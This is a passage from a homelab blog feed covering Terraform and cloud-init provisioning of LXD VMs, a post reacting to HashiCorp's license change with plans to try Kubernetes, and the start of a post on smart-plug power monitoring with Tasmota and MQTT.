</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">nictype</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridged&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">parent</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;your-bridge-interface-name&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-localdisk&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;localdisk&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">pool</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_storage_pool</span>.<span style="color:#a6e22e">lvm</span><span style="color:#f92672">-</span><span style="color:#a6e22e">pool</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">size</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;50GB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-controller&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.cpu&#34;</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.memory&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4GB&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-ceph&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.cpu&#34;</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.memory&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8GB&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With all of that created, I only needed the VMs themselves. But there was one
problem: In the rest of my (baremetal) Homelab, I&rsquo;m producing disk images with
HashiCorp&rsquo;s Packer, with my Ansible user and some other bits and pieces already
baked in. But now, I needed another way to bake in the Ansible user, as the goal
here is to learn Kubernetes - not LXD image creation. I didn&rsquo;t really want yet
another yak to shave.</p>
<h2 id="vm-images">VM images</h2>
<p>As noted above, I had already decided to go for Ubuntu as my base OS for the VMs.
The Ubuntu LXD images support <a href="https://cloudinit.readthedocs.io/en/latest/">cloud-init</a>,
and so does <a href="https://documentation.ubuntu.com/lxd/en/latest/cloud-init/">LXD</a> itself.</p>
<p>After some digging, I found that I could relatively easily create my Ansible
user and provide the SSH key for it. I could also adapt the sudoers files as
I needed to make it all work.</p>
<p>But one problem remained: I want my Ansible user to require a password
for sudo, but I did not want that password in the Terraform
state, let alone written out plainly in the Terraform config file. So what
to do?
In the end, the only thing I could come up with was to set a temporary
password for my Ansible user, and run a short bootstrapping playbook to change
it to the actual password. It does not feel very elegant, but it keeps my user&rsquo;s
sudo password out of the Terraform state and configs.</p>
<p>This can all be achieved with cloud-init. My <code>profile-base</code> LXD profile adds
the required cloud-config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.vendor-data&#34;</span> <span style="color:#f92672">=</span> file(<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">path</span>.module<span style="color:#e6db74">}</span><span style="color:#e6db74">/lxd/vendor-data.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>LXD&rsquo;s <a href="https://documentation.ubuntu.com/lxd/en/latest/cloud-init/#vendor-data-and-user-data">cloud-init.vendor-data</a>
config option is used here. The <code>cloud-init</code> config file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">your-ansible-user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">sudo</span>: <span style="color:#ae81ff">ALL=(ALL:ALL) ALL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ssh_authorized_keys</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">from=&#34;1.2.3.4&#34; ssh-ed25519 abcdef12345 ssh-identifier</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">sudo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">python3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">chpasswd</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">expire</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">your-ansible-user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: <span style="color:#ae81ff">your-temporary-password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">text</span>
</span></span></code></pre></div><p>This first creates the <code>your-ansible-user</code> user, with an appropriate <code>sudoers</code>
entry. It also adds an SSH key, allowing access only from a single machine,
which in my case is a dedicated Command &amp; Control host. I also add the <code>python3</code> and <code>sudo</code>
packages, which are required by Ansible.
Finally, I set the password for <code>your-ansible-user</code> to a pretty simple temporary value
which I had no problem committing to git.</p>
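<p>The bootstrapping run that later swaps out that temporary password isn&rsquo;t shown
here, but as a rough sketch - inventory file, group name and user name are
placeholders - it boils down to something like a single ad-hoc Ansible task:</p>
<pre tabindex="0"><code># generate a SHA-512 crypt hash of the real sudo password (prompts for it)
HASH=$(openssl passwd -6)

# set it on all freshly created VMs; -b -K uses sudo with the temporary
# password that cloud-init baked in
ansible k8s_lab -i inventory.ini -u your-ansible-user -b -K \
  -m ansible.builtin.user -a "name=your-ansible-user password=${HASH}"
</code></pre>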
<p>Seeing how well this worked also has me thinking about revamping
my Netbooting setup. At the moment, I&rsquo;m generating one image per host, even
though most things are the same among all hosts, and I could just have two base
images (one amd64, one arm64) and then do the necessary per-host adaptations by
running a cloud-init server in my network.</p>
<h2 id="creating-the-vms">Creating the VMs</h2>
<p>The last part of the setup is creating the VMs themselves:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_container&#34;</span> <span style="color:#e6db74">&#34;ceph-vm-1&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vm-name&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtual-machine&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">image</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu:22.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">profiles</span> <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">base</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">localdisk</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">ceph</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">start_container</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;cephdisk&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/sda2&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/cephdisk&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.user-data&#34;</span> <span style="color:#f92672">=</span> <span style="color:#f92672">&lt;&lt;-EOT</span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      hostname: vm-name
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    </span><span style="color:#f92672">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This resource remotely contacts the LXD server and creates a new VM. Don&rsquo;t get
confused by the <code>lxd_container</code> resource type: it is simply the resource type
shared between LXD containers and VMs, where the <code>type</code> field determines what&rsquo;s really
created.
In the <code>config</code> section, I&rsquo;m explicitly setting the <code>hostname</code> of the new machine
with the cloud-init user-data config option.
By default, the hostname is the same as the LXD VM name, which would be the <code>name</code>
field in Terraform. But as I sometimes have the habit of naming my VMs something
other than their actual hostname, I provided it explicitly here.</p>
<p><em>One very important point:</em> The <code>#cloud-config</code> at the top of the file is <strong>not</strong>
a comment - it is part of the cloud-init spec. It has to be there. Took me a
while to realize that&hellip;</p>
<p>The above example defines one of the two VMs which will end up serving as Ceph Rook
hosts, so it also gets handed an additional disk for later use by Ceph.</p>
<p>And that&rsquo;s it. After a final <code>terraform apply</code>, I&rsquo;ve finally got a Home<em>lab</em> again.</p>
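<p>To double-check that cloud-init actually did its thing inside the new VMs,
something like this works (using the placeholder remote and VM names from above):</p>
<pre tabindex="0"><code># list the new VMs on the remote LXD server
lxc list server-name-here:

# wait for cloud-init to finish inside a VM and report its status
lxc exec server-name-here:vm-name -- cloud-init status --wait
</code></pre>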
<p>Over the last week, I have been researching Kubernetes and cluster setups. I&rsquo;ve
got a couple of notes on the topic and will likely write another blog post with
all the prep work rather soon. If I&rsquo;m really lucky I might finally be ready
to issue the <code>kubeadm init</code> command later today. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>HashiPocalypse?</title>
      <link>https://blog.mei-home.net/posts/hashipocalypse/</link>
      <pubDate>Thu, 17 Aug 2023 20:49:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/hashipocalypse/</guid>
      <description>Possibly.</description>
<content:encoded><![CDATA[<p>Basically my entire Homelab is built upon HashiCorp&rsquo;s products. On August 10th,
HashiCorp <a href="https://www.hashicorp.com/blog/hashicorp-adopts-business-source-license">announced</a>
that they would switch all of their products to the <a href="https://www.hashicorp.com/bsl">BSL</a>,
the <em>Business Source License</em>, where they had been licensed under the Mozilla
Public License before.</p>
<p>From my (rather rudimentary!) understanding, the license basically says that all
&ldquo;non-production&rdquo; use is perfectly fine. I&rsquo;m pretty confident that that covers
all of my own personal usage. But as was pointed out to me today, that
formulation also creates a lot of uncertainty for commercial entities of all
kinds.</p>
<p>For some products, it looks pretty clear at first sight. When you offer hosted
Nomad, perhaps offering Vault for secrets and Consul for service discovery and
mesh networking as well, you can&rsquo;t use the products anymore, period.</p>
<p>If, on the other hand, you are using a Nomad cluster to run your SaaS offering,
it seems that you are fine (as long as the software you are aSS&rsquo;ing isn&rsquo;t another
HashiCorp product. &#x1f609;).</p>
<p>But there are other use cases for other products that look to me to be far less
clear-cut. For example, what about offering Vagrant-based VMs to your customers
for training on your own software?</p>
<p>Even more problematic seems to be the &ldquo;production use allowed as long as the
product doesn&rsquo;t compete with a HashiCorp offering&rdquo; clause. As far as I know,
HashiCorp does not currently offer Nomad or Consul hosted services. But they
do offer Terraform Cloud.</p>
<p>Terraform seems to be the biggest worry at the moment, at least from the posts
I saw. There is already an <a href="https://opentf.org/">OpenTF effort</a> ongoing. It is
first an appeal to HashiCorp to return Terraform to an Open Source license. But
it also threatens to fork Terraform from the last MPL release if the license is
not changed back:</p>
<blockquote>
<p>If HashiCorp is unwilling to switch Terraform back to an open source license, we propose to fork the legacy MPL-licensed Terraform and maintain the fork in the foundation. This is similar to how Linux and Kubernetes are managed by foundations (the Linux Foundation and the Cloud Native Computing Foundation, respectively), which are run by multiple companies, ensuring the tool stays truly open source and neutral, and not at the whim of any one company.</p></blockquote>
<p>What grates on me the most right now is how they did it from one day to the
next, with pretty much zero warning and no grace period at all. Granted, they
said they will backport fixes under the MPL to older releases for a while, but
they could have at least gone for a more user-friendly approach with a proper
grace period.</p>
<p>It&rsquo;s going to be interesting to see how this sudden course change works out for
them. It looks like they got hit as hard as everybody else by the end of the
zero interest rate era and the subsequent drying up of capital.</p>
<p>Or it might have something to do with them going public sometime last year. They
also had some lay-offs recently.</p>
<p>Might be that their business model simply doesn&rsquo;t work out and they are now
hoping for a cash infusion.</p>
<h1 id="so-what-about-the-hashicorp-homelab">So what about the HashiCorp Homelab?</h1>
<p>I&rsquo;m honestly still undecided how to continue with my Homelab. From my understanding,
the license change doesn&rsquo;t actually impact me at all. And the one licensing
aspect important to me is still there: Being able to look at the source code,
which helped me a lot when investigating some weird behaviors over the years.</p>
<p>Of course, with community contributions very likely sharply declining, I&rsquo;ve got
no idea how the tools I&rsquo;m currently using will develop.</p>
<p>But right now, I can only say this: At least for my Homelab use cases, the
HashiCorp tools are absolutely excellent. Both their usability and their
functionality are top-notch, and there are a lot of far larger projects which
would be well served by docs half as good as HashiCorp&rsquo;s.</p>
<p>Their tools have been absolutely rock solid for me, and offered all of the
features I could have dreamed up.</p>
<p>So my biggest problem is not that I expect anything to stop working, or that
I don&rsquo;t like their tools. Rather, using them now leaves a bad taste in my
mouth.</p>
<h1 id="alas">Alas&hellip;</h1>
<p>So what to do now? My Orchestrator is HashiCorp Nomad. My service discovery
and mesh networking is provided by HashiCorp Consul. My secrets for my Ansible
playbooks and Nomad jobs are stored in HashiCorp Vault. The disk images for all
of the hosts in my Homelab are created with HashiCorp Packer.
I use HashiCorp Terraform to configure all of the other HashiCorp tools.</p>
<p>A part of me has been thinking about taking the lab in a really weird direction,
namely deploying Red Hat OpenShift. That might be a fun project. But tying my lab
to yet another corporation is probably not the smartest of ideas. &#x1f609;</p>
<p>So while I don&rsquo;t want to tear everything down right now (I only finished the
current iteration of the Homelab last year!), this is still a welcome trigger
to dive into the deep end of Kubernetes.</p>
<p>Back when I first decided to expand my Homelab stack with an Orchestrator, I
looked at Kubernetes first - and then bounced off the sheer complexity of the
cluster setup. Specifically, I got to the &ldquo;Choose a CNI plugin&rdquo; section of the
docs. And after reading all the glossy pages of the different offerings, I not
only did not know which one to choose - I didn&rsquo;t even know <em>how</em> to make that
choice. But I want to give it at least a try now.</p>
<p>I&rsquo;m not yet entirely decided on which Kubernetes Distribution to choose, but
I&rsquo;m leaning towards just bog-standard k8s. I don&rsquo;t know why, but I&rsquo;ve always
leaned towards &ldquo;give me the vanilla experience&rdquo;, even when it&rsquo;s more painful
than the alternatives.</p>
<p>I would end up running the cluster on the same HW I&rsquo;m using now: eight
Raspberry Pi CM4s making up the core of the workers, three Raspberry Pi 4 4GB
as control nodes, and three x86 machines which currently run my Ceph cluster.</p>
<p>That&rsquo;s one thing I&rsquo;m genuinely interested in: <a href="https://rook.io/">Rook Ceph</a>,
which is a Ceph cluster run inside a Kubernetes cluster. This would make the
rather more beefy x86 machines available for other workloads as well, in what&rsquo;s
called a &ldquo;hyperconverged&rdquo; infra, if I&rsquo;m not mistaken. One of my biggest worries
about this part of the plan is whether I can somehow transform my current Ceph
cluster into a Ceph Rook cluster running on Kubernetes.</p>
<p>But until then, there&rsquo;s still a lot of research I have to do. The goal would
be to end up with a cluster that does pretty much the same as my current one.</p>
<p>In no particular order, here is what I will have to figure out:</p>
<ul>
<li>Service discovery, preferably via DNS and usable outside the cluster as well</li>
<li>Cluster networking with per-service permissions, to replace Consul Connect</li>
<li>Secrets management that&rsquo;s not just usable inside the cluster, but also for
things like my Ansible playbooks</li>
<li>Config file handling. I don&rsquo;t really like the &ldquo;Dump everything into env vars&rdquo;
approach for cloud native apps, and make heavy use of Nomad&rsquo;s consul-template
integration, also to e.g. insert secrets into config files</li>
<li>Ingress, which I would like to keep using Traefik for. Here it looks like that
should be possible, as e.g. k3s already ships with Traefik for ingress by default</li>
<li>Job definitions in one place/file instead of the half a dozen YAML files it
looks like Kubernetes needs? Perhaps my very own Helm repo is the solution here?</li>
<li>Does k8s actually run properly on Raspberry Pis?</li>
<li>Cluster shutdowns and reboots, without having to stop every single job by hand</li>
<li>How to set up the networking? From what I understand, Kubernetes uses a separate
cluster network</li>
</ul>
<p>What I don&rsquo;t think I will do is go the GitOps route via e.g. ArgoCD. To set up
something like that, I would most likely need to run the necessary tools, including
Gitea and all of its dependencies, outside the cluster. That&rsquo;s a thought I&rsquo;ve never liked,
because it means having to maintain two completely separate environments.</p>
<h1 id="the-plan-for-now">The Plan for now</h1>
<p>To begin with, I will dig up my homeserver from the days when my Homelab only
consisted of a single machine. That has an Intel i7 10700 8c/16t CPU. And if my
inventory is correct, I should have 64 GB of unused RAM somewhere, as well as
about 1TB worth of SATA SSDs.</p>
<p>I will most likely just put Ubuntu on it and run LXD for the VMs, just because
I&rsquo;m familiar with LXD VMs from my previous Homelab iteration. Then I will set up three 4 GB VMs for the controller nodes,
because that&rsquo;s how much RAM my three controller Raspberry Pis have. The rest
will then go to the worker VMs.</p>
<p>The idea is to then experiment with the Kubernetes cluster until I have all
moving parts I want in place, preferably including an example Ceph Rook cluster.
That will give me enough time and space to spend some weekends experimenting
with a Kubernetes Homelab.</p>
<p>Also, for the first time in a very long time, at least part of my Homelab will
be for genuine experimentation, instead of being purely a HomeProd setup. &#x1f642;</p>
<p>Once all of that is done, the future direction of HashiCorp&rsquo;s tools will likely
have become a lot clearer, and I can then - after not even two years -
decide the fate of the HashiCorp Homelab. Regardless of the outcome of my
Kubernetes experiment, I had a lot of fun with the HashiCorp tools.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Power Measurements in the Homelab</title>
      <link>https://blog.mei-home.net/posts/power-measurement/</link>
      <pubDate>Tue, 13 Jun 2023 22:36:33 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/power-measurement/</guid>
      <description>Using smart plugs to measure power consumption in the Homelab with MQTT and Prometheus</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve long been wondering how much power my Homelab consumes, especially with
my switch from a single relatively beefy server to a gaggle of Raspberry Pis.</p>
<p>In the end, I put in three smart plugs supporting MQTT. I would have loved to
have per-machine power consumption stats, but I didn&rsquo;t want to invest that much
money into smart plugs.</p>
<p>To whet your appetite a bit, here is a snapshot of the resulting Grafana
dashboard:</p>
<figure>
    <img loading="lazy" src="grafana-dashboard.png"
         alt="A screenshot of three Grafana visualizations on a dashboard. The top one is headed &#39;Overall current power draw&#39;. The X axis has time on it, from 17:30h on 2023-04-20 to 17:00h 2023-04-27. The Y axis contains Watt numbers, from 0W to 300W. It contains three lines, labeled &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The deskright line goes down to 10W regularly during nighttime, while showing peaks to 300W with an average of 100W. The &#39;deskleft&#39; line switches between 30W and 6W, following the same pattern of low load during nighttime and high load during daytime. Both the deskleft and deskright lines fall off completely 6W and 10W after 2023.04.24. The &#39;homelab&#39; line starts out oscillating around 125W, but starts oscillating around 150W after 2023-04-23. It remains at that level even after deskright and deskleft go flat. The second graph is headed &#39;Total Power Draw. It#s a bar chart, with &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39; on the X axis and kWh going from 0 to 4 on the Y axis. It shows very short bars for deskleft and deskright below 1kWh, while the homelab bars are up to 3.5kWh. The last chart is headed &#39;Total power consumption last week&#39;. It has the weekdays on the X axis, going from Wednesday to Thursday. On the Y axis is power consumption in kWh again, going from 0 to 4. For the first Wednesday and Thursday, the consumption for the homelab is still around 3.05 kWh, but it increases 3.62 by Monday."/> <figcaption>
            <p>Screenshot of my power consumption dashboard.</p>
        </figcaption>
</figure>

<p>These plots are produced from two of the data points provided by my smart plugs,
namely the total current power draw, and the total daily consumption in kWh. I
will go into more detail on the plots later in this article.</p>
<p>I will show the setup of the <a href="https://github.com/arendst/Tasmota">Tasmota</a> based
smart plugs I bought. In addition, I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a>
as my MQTT message broker. The <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>
exporter does the conversion of MQTT messages from the plugs to the prometheus
format.</p>
<p>Here is an overview of the setup:</p>
<figure>
    <img loading="lazy" src="power_plugs_diagram.svg"
         alt="A diagram of the power plug setup. At the top, the Tasmota logo with the stylized home logo is copied three times, each copy having a label of &#39;plug 1&#39; to &#39;plug 3&#39;. Red arrows, labeled &#39;TCP/MQTT&#39; go from each of the Tasmota logos to a single OpenWRT logo. This logo is labeled &#39;WiFi router&#39;. From that router, a red arrow goes to the OPNsense logo, which is labeled &#39;firewall&#39;. From there, a blue arrow goes the Traefik proxy logo and another blue arrow goes from that to the Mosquitto MQTT broker logo. Finally, another blue arrow goes from a box labeled &#39;MQTT2Prometheus&#39; to the Mosquitto logo. A final blue arrow goes from the stylized torch logo of Prometheus to the MQTT2Prometheus box."/> <figcaption>
            <p>Overview of the power measurement setup. The red arrows mark the IoT VLAN, and the blue arrows mark the Homelab VLAN.</p>
        </figcaption>
</figure>

<p>After the setup, I will also give an overview of the information I got out of
this, to show the utility of a setup like this.</p>
<p>One question you might already have is: Why not Home Assistant? The answer is
pretty simple: I&rsquo;ve got no plans, at the moment at least, to go any further than
using the plugs to measure power consumption. There&rsquo;s going to be no automation.
So Home Assistant would be overkill for my purpose. If and when I start using
automations, I will reconsider. But for now, I&rsquo;m pretty happy with my &ldquo;several
tools each doing one thing right&rdquo; approach, instead of Home Assistant&rsquo;s Swiss Army
knife approach.</p>
<h2 id="setting-up-an-iot-wifi">Setting up an IoT WiFi</h2>
<p>As I noted in a <a href="https://blog.mei-home.net/posts/vlans/">previous post</a>, I already
have a VLAN for my IoT devices. Until I installed the plugs, it was only home
to my VOIP DECT base station and my network printer.</p>
<p>Now, I need to extend that VLAN to a separate WiFi in my OpenWRT WiFi router.</p>
<p>The first step in doing so is to actually configure an additional WiFi for the
plugs.</p>
<figure>
    <img loading="lazy" src="openwrt_device_list.png"
         alt="A screenshot of OpenWRTs device list, with an entry called &#39;radio0&#39; with three buttons visible. The three buttons are &#39;Restart&#39;, &#39;Scan&#39; and &#39;Add&#39;."/> <figcaption>
            <p>Screenshot of the radio entry in the OpenWRT device list.</p>
        </figcaption>
</figure>

<p>Adding an additional WiFi in OpenWRT is pretty simple. Just choose the radio
you want to use in your device list (I&rsquo;ve got two, for example: the 2.4 GHz and
the 5 GHz one). Then click the &ldquo;Add&rdquo; button, and a new window for configuring
the new WiFi will appear.</p>
<p>One important note: I&rsquo;m not 100% sure whether supporting multiple WiFis at once
is the default now, or whether it depends on the WiFi chipset any given AP uses.
So check yours to make sure before embarking on a big project. &#x1f609;</p>
<p>I gave the new WiFi a catchy name (okay, I just appended &ldquo;iot&rdquo; to my existing
WiFi&rsquo;s name &#x1f605;) and then hid the SSID. This isn&rsquo;t a security measure,
it just relieves the WiFi clutter a bit by hiding a WiFi which is not intended
to ever be used by humans.</p>
<p>One thing I found important to do: Enabling the &ldquo;Isolate Clients&rdquo; option
in the &ldquo;Advanced Settings&rdquo; tab. This prevents two clients on that WiFi from
talking to each other. My IoT devices will get to talk to exactly one thing,
my MQTT broker, and absolutely nothing else.</p>
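<p>For the terminal-inclined: the same settings can also be made through UCI on the
router, which the LuCI web UI writes to <code>/etc/config/wireless</code> anyway. This is
only a rough sketch with made-up section, SSID and network names:</p>
<pre tabindex="0"><code># create a hidden, client-isolated IoT WiFi on radio0
uci set wireless.iot=wifi-iface
uci set wireless.iot.device='radio0'
uci set wireless.iot.mode='ap'
uci set wireless.iot.ssid='mywifi-iot'
uci set wireless.iot.hidden='1'
uci set wireless.iot.isolate='1'
uci set wireless.iot.encryption='psk2'
uci set wireless.iot.key='your-wifi-password'
uci set wireless.iot.network='iot'

# save and apply the wireless config
uci commit wireless
wifi reload
</code></pre>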
<p>Next up is configuring the new WiFi to use the IoT VLAN. I will not go into
details here, as I&rsquo;ve already covered the setup for a WiFi VLAN in my
<a href="https://blog.mei-home.net/posts/vlans/">detailed article on VLANs</a>, and there
were no special configs required for the IoT VLAN.
The only thing to mention on this is that the IoT VLAN is pretty much nailed
shut. The only outgoing connections allowed are to the Firewall itself, for
DHCP and DNS, and to the MQTT broker.</p>
<h2 id="the-plugs">The plugs</h2>
<p>The plugs I bought were <a href="https://de.athom.tech/blank-1/EU-plug">from Athom</a>. The
main draw was the relatively low cost, and the fact that they already come with
Tasmota pre-flashed. They also support a sufficiently high max load of 3680 Watts.</p>
